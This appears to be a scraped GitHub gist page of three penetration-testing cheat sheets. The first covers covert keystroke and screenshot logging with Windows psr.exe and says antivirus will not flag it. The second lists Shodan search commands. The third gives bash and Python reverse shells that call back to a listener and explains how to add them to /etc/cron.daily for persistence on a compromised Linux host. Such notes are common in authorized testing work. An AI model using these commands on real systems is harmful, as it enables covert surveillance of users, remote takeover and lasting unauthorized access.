TartarusLabs
/ notes_keylogging_windows.txt
Created
April 21, 2022 21:31
Living off the Land method for logging keystrokes and taking screenshots using Problem Steps Recorder built-in Windows utility psr.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows workstations have a built-in utility called Problem Steps Recorder that can be used covertly by penetration testers to record keystrokes and screenshots of user activity. There is no risk of AV flagging this since it is a signed Microsoft binary. | |
| To start logging the user's activity: | |
| psr.exe /start /gui 0 /output C:\Users\user\AppData\Local\log.zip | |
| To stop logging: | |
| psr.exe /stop | |
| Once the process is stopped, the zip file will be created. |
TartarusLabs
/ notes_shodan_cli.txt
Last active
April 25, 2022 10:35
Useful options when using the shodan CLI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Setting Up | |
| sudo pip install shodan # Install shodan | |
| shodan init API_KEY # Initialise it with your API key | |
| Searching Existing Database | |
| shodan search "net:212.159.101.101/24 port:22" # Search specific IP range for a specific port | |
| shodan search "nginx port:5011" # Search for banner text on specific open port |
TartarusLabs
/ notes_reverse_shells_linux.txt
Created
April 19, 2022 13:14
Linux simple reverse shells (bash, python and php options)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| All reverse shells assume a standard netcat listener on TCP port 443 of 192.168.1.100 (nc -nvlp 443) ready to catch the shell. Modify as needed. | |
| Add one of these to one of the existing scripts in /etc/cron.daily to get persistence on a compromised Linux box. | |
| # Shell script | |
| sh -i >& /dev/tcp/192.168.1.100/443 0>&1 | |
| # Python | |
| python -c 'import os,pty,sys,socket; sock=socket.socket(); sock.connect(("192.168.1.100",443)); [os.dup2(sock.fileno(),f) for f in (0,1,2)]; pty.spawn("/bin/sh")' |